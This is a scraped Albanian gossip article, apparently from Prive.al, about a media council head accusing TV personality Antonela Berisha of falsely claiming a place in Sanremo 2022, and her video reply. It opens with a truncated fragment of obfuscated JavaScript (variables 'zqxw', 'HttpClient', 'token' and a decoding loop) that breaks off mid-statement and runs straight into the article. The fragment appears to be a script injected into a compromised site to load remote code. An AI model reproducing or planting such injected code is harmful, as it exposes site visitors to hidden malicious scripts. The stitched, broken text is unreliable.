;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Antonela reagon për akuzat se mashtroi në lidhje me spektaklin “Sanremo”

By

Antonela Berisha ditë më parë dha lajmin se do të jetë pjesë e spektaklit të madh italian, Sanremo 2022.

Por, personaliteti televiziv po akuzohet për mashtrim! Këtë e ka bërë, Kryetari i Këshillit të Medias, Koloreto Cukali, i cili në Top Albania Radios, ka hedhur poshtë lajmin.

Sipas tij, njoftimin e ka postuar vetëm një media italiane dhe më pas po i njëjti lajm është fshirë. Gjithashtu ai ka shtuar, se ekzistonte vetëm një screenshot, nga një portal italian por që sot nuk është më.

“Unë atë portalin nuk e gjej më. Ka portale që paguan. Kjo puna e Sanremos është thjesht në kokën e zonjushës, Antonela Berisha. Sanremo është një qytezë, që edha ai që shet byreqe, thotë jam në Sanremo. Mirëpo, pjesëmarrja në qytet nuk të bën pjesë të një spektakli”, u shpreh ai.

Menjëherë pas këtij lajmi ka reaguar vet Antonela përmes një video mesazhi të gjatë ku sqaron gjithë situatën dhe më tej ndan edhe disa postime./Prive.al

Artikuj të ngjashëm